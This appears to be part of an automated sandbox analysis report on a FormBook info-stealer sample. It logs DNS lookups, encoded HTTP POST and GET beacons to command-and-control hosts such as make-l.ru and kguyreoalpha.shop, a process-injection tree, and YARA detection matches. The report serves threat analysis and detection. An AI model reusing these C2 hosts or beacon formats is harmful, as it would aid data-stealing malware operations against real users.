            May 27, 2024 19:16:09.842380047 CEST | 192.168.2.5 | 1.1.1.1 | 0x6274 | Standard query (0) | www.make-l.ru | A (IP address) | IN (0x0001) | false
            May 27, 2024 19:16:23.641004086 CEST | 192.168.2.5 | 1.1.1.1 | 0xcdfd | Standard query (0) | www.kguyreoalpha.shop | A (IP address) | IN (0x0001) | false
            May 27, 2024 19:16:59.248620033 CEST | 192.168.2.5 | 1.1.1.1 | 0x7c70 | Standard query (0) | www.waldil.online | A (IP address) | IN (0x0001) | false
            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
            May 27, 2024 19:15:37.866555929 CEST | 1.1.1.1 | 192.168.2.5 | 0xb68c | Server failure (2) | www.sweet777.work | none | none | A (IP address) | IN (0x0001) | false
            May 27, 2024 19:15:43.459127903 CEST | 1.1.1.1 | 192.168.2.5 | 0xa572 | No error (0) | www.goodroothealth.com | | 66.113.136.229 | A (IP address) | IN (0x0001) | false
            May 27, 2024 19:16:10.026493073 CEST | 1.1.1.1 | 192.168.2.5 | 0x6274 | No error (0) | www.make-l.ru | | 194.58.112.174 | A (IP address) | IN (0x0001) | false
            May 27, 2024 19:16:24.030093908 CEST | 1.1.1.1 | 192.168.2.5 | 0xcdfd | No error (0) | www.kguyreoalpha.shop | | 43.132.225.97 | A (IP address) | IN (0x0001) | false
            May 27, 2024 19:16:59.264856100 CEST | 1.1.1.1 | 192.168.2.5 | 0x7c70 | No error (0) | www.waldil.online | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
            May 27, 2024 19:16:59.264856100 CEST | 1.1.1.1 | 192.168.2.5 | 0x7c70 | No error (0) | www.waldil.online | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
            • www.goodroothealth.com
            • www.make-l.ru
            • www.kguyreoalpha.shop
            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            0 | 192.168.2.5 | 49711 | 66.113.136.229 | 80 | 7132 | C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe
            Timestamp | Bytes transferred | Direction | Data
            May 27, 2024 19:15:43.469777107 CEST | 518 | OUT | GET /0so0/?X430XLq0=CY1s0XH7bNWttwV9rZ4SbfagXQ6dqpRCQvxAN47rZ58SWMnAte1QXQdn29aNO6h1oK8GMPzGoaIoZ8sBEayCkb2ait1G89/ayPLVJ4jhwFoJQSPoL8Uww1rncwUMKC4qFA==&Wd=vjk8lhT0U4 HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            Accept-Language: en-US,en;q=0.9
            Host: www.goodroothealth.com
            Connection: close
            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            1 | 192.168.2.5 | 49713 | 194.58.112.174 | 80 | 7132 | C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe
            Timestamp | Bytes transferred | Direction | Data
            May 27, 2024 19:16:10.032521963 CEST | 761 | OUT | POST /0so0/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            Host: www.make-l.ru
            Cache-Control: no-cache
            Content-Length: 209
            Content-Type: application/x-www-form-urlencoded
            Connection: close
            Origin: http://www.make-l.ru
            Referer: http://www.make-l.ru/0so0/
            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Data Raw: 58 34 33 30 58 4c 71 30 3d 66 57 6e 74 58 34 37 33 48 61 64 4b 4e 48 50 57 50 51 2f 54 55 52 4f 36 79 6d 6e 59 65 35 35 4b 4e 6b 48 58 62 56 51 34 36 62 70 35 44 41 47 75 6d 69 73 67 58 36 39 64 6a 4a 6b 59 41 35 69 49 39 6b 33 6a 55 68 49 79 2f 41 55 63 48 5a 53 50 31 65 73 51 38 4c 4f 6a 58 66 57 59 68 34 74 6c 48 62 78 4a 47 35 50 6a 31 6a 30 6a 4d 65 59 7a 50 4f 42 73 54 34 59 47 71 70 6a 2b 7a 33 6b 5a 46 6f 6b 56 53 71 6f 73 51 65 4e 61 47 59 57 50 61 52 50 4a 34 44 75 69 4a 4a 6b 44 65 6c 47 32 30 48 67 4a 54 59 39 68 59 4c 64 77 76 32 4f 32 78 2f 64 77 63 61 50 56 32 47 41 70 56 32 4b 54 55 6d 53 6d 66 65 59 3d
            Data Ascii: X430XLq0=fWntX473HadKNHPWPQ/TURO6ymnYe55KNkHXbVQ46bp5DAGumisgX69djJkYA5iI9k3jUhIy/AUcHZSP1esQ8LOjXfWYh4tlHbxJG5Pj1j0jMeYzPOBsT4YGqpj+z3kZFokVSqosQeNaGYWPaRPJ4DuiJJkDelG20HgJTY9hYLdwv2O2x/dwcaPV2GApV2KTUmSmfeY=
            Timestamp: May 27, 2024 19:16:10.725030899 CEST
            Bytes transferred: 339
            Direction: IN
            Data: HTTP/1.1 302 Moved Temporarily
            Server: nginx
            Date: Mon, 27 May 2024 17:16:10 GMT
            Content-Type: text/html
            Content-Length: 154
            Connection: close
            Location: http://make-l.ru/0so0/
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


            Session ID: 2
            Source IP: 192.168.2.5
            Source Port: 49714
            Destination IP: 194.58.112.174
            Destination Port: 80
            PID: 7132
            Process: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe

            Timestamp: May 27, 2024 19:16:12.566468000 CEST
            Bytes transferred: 781
            Direction: OUT
            Data: POST /0so0/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            Host: www.make-l.ru
            Cache-Control: no-cache
            Content-Length: 229
            Content-Type: application/x-www-form-urlencoded
            Connection: close
            Origin: http://www.make-l.ru
            Referer: http://www.make-l.ru/0so0/
            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Data Raw: 58 34 33 30 58 4c 71 30 3d 66 57 6e 74 58 34 37 33 48 61 64 4b 4c 6d 2f 57 4f 77 44 54 44 68 4f 37 38 47 6e 59 55 5a 34 4e 4e 6b 62 58 62 55 55 6f 37 6f 42 35 43 68 32 75 6c 6a 73 67 65 71 39 64 73 70 6c 51 59 5a 69 44 39 6b 72 61 55 6c 41 79 2f 45 30 63 48 63 75 50 31 6f 6b 58 38 62 4f 68 43 50 57 4a 76 59 74 6c 48 62 78 4a 47 34 2f 4e 31 6c 63 6a 4d 76 6f 7a 65 63 35 76 51 34 59 46 76 70 6a 2b 69 6e 6b 56 46 6f 6b 7a 53 6f 63 53 51 64 35 61 47 64 36 50 65 55 7a 4b 33 44 75 37 57 35 6c 73 59 48 48 71 7a 58 51 56 4f 76 4e 38 4f 4e 42 43 71 41 6a 63 72 64 56 59 50 36 6a 74 6d 56 49 65 45 47 72 36 4f 46 43 57 42 4a 50 64 6c 4b 67 35 32 41 33 4c 32 79 71 2b 6e 4a 5a 34 6d 6e 65 32
            Data Ascii: X430XLq0=fWntX473HadKLm/WOwDTDhO78GnYUZ4NNkbXbUUo7oB5Ch2uljsgeq9dsplQYZiD9kraUlAy/E0cHcuP1okX8bOhCPWJvYtlHbxJG4/N1lcjMvozec5vQ4YFvpj+inkVFokzSocSQd5aGd6PeUzK3Du7W5lsYHHqzXQVOvN8ONBCqAjcrdVYP6jtmVIeEGr6OFCWBJPdlKg52A3L2yq+nJZ4mne2
            Timestamp: May 27, 2024 19:16:13.255140066 CEST
            Bytes transferred: 339
            Direction: IN
            Data: HTTP/1.1 302 Moved Temporarily
            Server: nginx
            Date: Mon, 27 May 2024 17:16:13 GMT
            Content-Type: text/html
            Content-Length: 154
            Connection: close
            Location: http://make-l.ru/0so0/
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


            Session ID: 3
            Source IP: 192.168.2.5
            Source Port: 49715
            Destination IP: 194.58.112.174
            Destination Port: 80
            PID: 7132
            Process: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe

            Timestamp: May 27, 2024 19:16:15.388653994 CEST
            Bytes transferred: 1798
            Direction: OUT
            Data: POST /0so0/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            Host: www.make-l.ru
            Cache-Control: no-cache
            Content-Length: 1245
            Content-Type: application/x-www-form-urlencoded
            Connection: close
            Origin: http://www.make-l.ru
            Referer: http://www.make-l.ru/0so0/
            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Data Raw: 58 34 33 30 58 4c 71 30 3d 66 57 6e 74 58 34 37 33 48 61 64 4b 4c 6d 2f 57 4f 77 44 54 44 68 4f 37 38 47 6e 59 55 5a 34 4e 4e 6b 62 58 62 55 55 6f 37 6f 5a 35 44 54 2b 75 6c 41 45 67 45 71 39 64 6c 4a 6c 52 59 5a 69 6b 39 6b 69 53 55 6c 46 48 2f 47 4d 63 49 65 57 50 33 61 4d 58 33 62 4f 68 41 50 58 4f 68 34 74 77 48 66 73 4f 47 34 50 4e 31 6c 63 6a 4d 73 41 7a 4f 2b 42 76 57 34 59 47 71 70 6a 79 7a 33 6c 38 46 6f 63 4e 53 6f 49 43 52 72 4a 61 48 35 61 50 63 43 6e 4b 2b 44 75 75 58 35 6c 30 59 48 4c 44 7a 55 6b 5a 4f 71 77 30 4f 4b 6c 43 71 31 47 38 79 4e 4a 30 61 72 53 42 72 33 30 4c 65 52 71 57 46 58 4c 6d 65 4c 76 6b 35 4f 6f 52 38 67 62 70 37 77 33 4b 39 66 52 74 6b 51 62 6d 77 63 67 75 57 73 71 78 48 32 64 6a 46 61 36 62 41 7a 4f 52 73 57 31 41 61 4d 57 78 2f 54 6c 4f 30 42 63 32 49 4b 35 75 4b 6f 72 70 47 62 44 65 65 68 51 57 48 4e 59 4a 54 50 56 4b 47 35 6d 33 79 70 79 71 52 6f 6c 74 65 6e 36 74 6c 72 46 74 36 58 6d 2f 59 5a 2f 47 6b 73 65 78 41 6d 48 58 70 75 51 72 4a 69 31 4a 77 57 4e 4b 67 [TRUNCATED]
            Data Ascii: X430XLq0= [TRUNCATED]
            Timestamp: May 27, 2024 19:16:16.096960068 CEST
            Bytes transferred: 339
            Direction: IN
            Data: HTTP/1.1 302 Moved Temporarily
            Server: nginx
            Date: Mon, 27 May 2024 17:16:15 GMT
            Content-Type: text/html
            Content-Length: 154
            Connection: close
            Location: http://make-l.ru/0so0/
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


            Session ID: 4
            Source IP: 192.168.2.5
            Source Port: 49716
            Destination IP: 194.58.112.174
            Destination Port: 80
            PID: 7132
            Process: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe

            Timestamp: May 27, 2024 19:16:17.928508997 CEST
            Bytes transferred: 509
            Direction: OUT
            Data: GET /0so0/?Wd=vjk8lhT0U4&X430XLq0=SUPNUPL8X55ZGDaBFxP5SDbwzWvdce9LIUPHC0QIzt1ZKzL94hFLYJx7/4VaKoGV20qcYSFkx0JiG8qMm/Id/bOZDN/8qZd0HZpra/ntz1I1MPsqBdN1VMBNg4zQsHhwAw== HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            Accept-Language: en-US,en;q=0.9
            Host: www.make-l.ru
            Connection: close
            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Timestamp: May 27, 2024 19:16:18.629443884 CEST
            Bytes transferred: 495
            Direction: IN
            Data: HTTP/1.1 302 Moved Temporarily
            Server: nginx
            Date: Mon, 27 May 2024 17:16:18 GMT
            Content-Type: text/html
            Content-Length: 154
            Connection: close
            Location: http://make-l.ru/0so0/?Wd=vjk8lhT0U4&X430XLq0=SUPNUPL8X55ZGDaBFxP5SDbwzWvdce9LIUPHC0QIzt1ZKzL94hFLYJx7/4VaKoGV20qcYSFkx0JiG8qMm/Id/bOZDN/8qZd0HZpra/ntz1I1MPsqBdN1VMBNg4zQsHhwAw==
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


            Session ID: 5
            Source IP: 192.168.2.5
            Source Port: 49717
            Destination IP: 43.132.225.97
            Destination Port: 80
            PID: 7132
            Process: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe

            Timestamp: May 27, 2024 19:16:24.039251089 CEST
            Bytes transferred: 785
            Direction: OUT
            Data: POST /0so0/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            Host: www.kguyreoalpha.shop
            Cache-Control: no-cache
            Content-Length: 209
            Content-Type: application/x-www-form-urlencoded
            Connection: close
            Origin: http://www.kguyreoalpha.shop
            Referer: http://www.kguyreoalpha.shop/0so0/
            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Data Raw: 58 34 33 30 58 4c 71 30 3d 55 56 45 53 70 59 75 41 4d 66 4e 45 66 36 2b 35 35 59 6e 73 34 75 77 75 76 34 77 42 48 49 30 56 70 66 41 44 76 51 68 73 63 2b 43 4a 42 72 53 58 65 52 78 35 55 79 4c 42 44 70 50 4a 57 47 55 47 73 69 4d 52 54 76 58 48 4b 78 78 55 4f 4e 65 42 78 65 57 57 64 45 66 63 4f 49 66 6e 51 2f 6d 57 6a 42 4c 67 32 64 6f 66 53 49 38 4d 4d 43 43 54 41 41 58 6b 63 79 79 50 64 61 68 57 58 47 73 2b 6c 35 69 31 6a 47 31 48 76 38 67 69 38 70 50 36 75 61 6c 6e 6e 36 62 2b 43 79 71 6f 46 59 4b 66 71 48 77 77 4e 32 51 54 48 79 57 67 6f 43 47 6b 69 38 6c 6c 30 30 43 75 32 54 35 58 5a 71 70 30 35 30 79 35 70 68 6f 3d
            Data Ascii: X430XLq0=UVESpYuAMfNEf6+55Yns4uwuv4wBHI0VpfADvQhsc+CJBrSXeRx5UyLBDpPJWGUGsiMRTvXHKxxUONeBxeWWdEfcOIfnQ/mWjBLg2dofSI8MMCCTAAXkcyyPdahWXGs+l5i1jG1Hv8gi8pP6ualnn6b+CyqoFYKfqHwwN2QTHyWgoCGki8ll00Cu2T5XZqp050y5pho=


            Session ID: 6
            Source IP: 192.168.2.5
            Source Port: 49718
            Destination IP: 43.132.225.97
            Destination Port: 80
            PID: 7132
            Process: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe

            Timestamp: May 27, 2024 19:16:26.567429066 CEST
            Bytes transferred: 805
            Direction: OUT
            Data: POST /0so0/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            Host: www.kguyreoalpha.shop
            Cache-Control: no-cache
            Content-Length: 229
            Content-Type: application/x-www-form-urlencoded
            Connection: close
            Origin: http://www.kguyreoalpha.shop
            Referer: http://www.kguyreoalpha.shop/0so0/
            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Data Raw: 58 34 33 30 58 4c 71 30 3d 55 56 45 53 70 59 75 41 4d 66 4e 45 65 5a 32 35 37 2f 54 73 77 75 77 74 71 34 77 42 53 59 30 5a 70 66 4d 44 76 56 4e 43 63 4c 53 4a 45 37 69 58 66 56 6c 35 58 79 4c 42 62 35 50 4d 4a 57 55 64 73 69 4a 69 54 74 54 48 4b 78 56 55 4f 4a 53 42 78 76 57 52 63 55 66 65 62 59 66 68 65 66 6d 57 6a 42 4c 67 32 64 73 31 53 49 45 4d 4d 79 79 54 48 52 58 37 52 53 79 4d 55 36 68 57 64 6d 73 36 6c 35 6a 57 6a 43 31 70 76 2b 6f 69 38 6f 2f 36 76 49 64 6f 2b 4b 62 30 4d 53 72 66 4e 73 54 37 73 56 34 6d 47 48 68 41 52 56 79 70 67 55 72 4f 34 65 74 4e 6e 55 75 57 6d 41 78 67 49 61 49 64 6a 58 69 4a 33 32 38 49 62 6b 6e 77 51 32 56 45 32 44 66 68 66 31 31 49 44 33 65 35
            Data Ascii: X430XLq0=UVESpYuAMfNEeZ257/Tswuwtq4wBSY0ZpfMDvVNCcLSJE7iXfVl5XyLBb5PMJWUdsiJiTtTHKxVUOJSBxvWRcUfebYfhefmWjBLg2ds1SIEMMyyTHRX7RSyMU6hWdms6l5jWjC1pv+oi8o/6vIdo+Kb0MSrfNsT7sV4mGHhARVypgUrO4etNnUuWmAxgIaIdjXiJ328IbknwQ2VE2Dfhf11ID3e5


            Session ID: 7
            Source IP: 192.168.2.5
            Source Port: 49719
            Destination IP: 43.132.225.97
            Destination Port: 80
            PID: 7132
            Process: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe

            Timestamp: May 27, 2024 19:16:29.098670959 CEST
            Bytes transferred: 1822
            Direction: OUT
            Data: POST /0so0/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            Host: www.kguyreoalpha.shop
            Cache-Control: no-cache
            Content-Length: 1245
            Content-Type: application/x-www-form-urlencoded
            Connection: close
            Origin: http://www.kguyreoalpha.shop
            Referer: http://www.kguyreoalpha.shop/0so0/
            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Data Raw: 58 34 33 30 58 4c 71 30 3d 55 56 45 53 70 59 75 41 4d 66 4e 45 65 5a 32 35 37 2f 54 73 77 75 77 74 71 34 77 42 53 59 30 5a 70 66 4d 44 76 56 4e 43 63 4c 61 4a 45 6f 71 58 65 30 6c 35 57 79 4c 42 46 70 50 4e 4a 57 55 51 73 69 78 75 54 74 66 39 4b 7a 64 55 50 73 4f 42 33 63 4f 52 56 55 66 65 5a 59 66 67 51 2f 6d 48 6a 41 37 6b 32 63 63 31 53 49 45 4d 4d 78 71 54 52 51 58 37 54 53 79 50 64 61 68 73 58 47 73 43 6c 35 71 74 6a 43 35 58 75 4f 49 69 38 49 76 36 73 39 4a 6f 68 36 62 36 4c 53 72 48 4e 70 4c 6b 73 52 67 71 47 48 6b 62 52 54 43 70 6a 43 6d 70 38 75 68 56 2b 57 4f 41 6b 77 68 4d 4a 2f 4e 77 74 30 69 49 32 6c 6c 79 66 51 2f 54 57 42 39 6c 32 69 75 66 64 69 4a 6b 41 79 4f 34 32 31 30 68 4d 4a 76 6b 43 71 76 54 33 63 48 4d 56 59 30 63 50 59 7a 71 51 52 70 56 52 38 73 4d 49 67 79 69 58 6a 35 77 34 61 50 45 6b 43 31 56 58 67 47 38 6d 37 71 38 34 65 41 49 79 4b 78 38 4c 2f 73 65 47 59 73 58 31 66 56 70 41 4b 79 6d 50 54 67 78 74 51 72 59 2f 30 44 36 69 32 47 76 2f 52 45 58 66 6f 32 31 46 32 32 51 41 [TRUNCATED]
            Data Ascii: X430XLq0= [TRUNCATED]


            Session ID: 8
            Source IP: 192.168.2.5
            Source Port: 49720
            Destination IP: 43.132.225.97
            Destination Port: 80
            PID: 7132
            Process: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe

            Timestamp: May 27, 2024 19:16:32.483493090 CEST
            Bytes transferred: 517
            Direction: OUT
            Data: GET /0so0/?X430XLq0=ZXsyqv6OWO1jdfmZwPHK8dAntN05Z+dsmugw9BJBTbqyaa2WOVN+U2naZpjsCmE4tUAeXtTgCCsmM8Dup6ejRXHoa4TAR4CFgRPYrdUpMYgqMRztZg/3Zk7YYa9ZW1B17w==&Wd=vjk8lhT0U4 HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            Accept-Language: en-US,en;q=0.9
            Host: www.kguyreoalpha.shop
            Connection: close
            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36



            Target ID:0
            Start time:13:14:50
            Start date:27/05/2024
            Path:C:\Users\user\Desktop\F2024-202202.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\F2024-202202.exe"
            Imagebase:0x180000
            File size:1'165'312 bytes
            MD5 hash:0E7042C3256BA6A60BEE8CF70A18958C
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            Target ID:2
            Start time:13:14:51
            Start date:27/05/2024
            Path:C:\Windows\SysWOW64\svchost.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\F2024-202202.exe"
            Imagebase:0x6c0000
            File size:46'504 bytes
            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2345744782.0000000004400000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2345744782.0000000004400000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2345390681.0000000003280000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2345390681.0000000003280000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2345007571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2345007571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
            Reputation:moderate
            Has exited:true

            Target ID:4
            Start time:13:15:16
            Start date:27/05/2024
            Path:C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe
            Wow64 process (32bit):true
            Commandline:"C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe"
            Imagebase:0x100000
            File size:140'800 bytes
            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3254116085.00000000033E0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3254116085.00000000033E0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
            Reputation:high
            Has exited:false

            Target ID:5
            Start time:13:15:18
            Start date:27/05/2024
            Path:C:\Windows\SysWOW64\openfiles.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\SysWOW64\openfiles.exe"
            Imagebase:0x630000
            File size:60'416 bytes
            MD5 hash:50BD10A4C573E609A401114488299D3D
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3252950287.0000000002650000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3252950287.0000000002650000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3252870052.00000000005F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
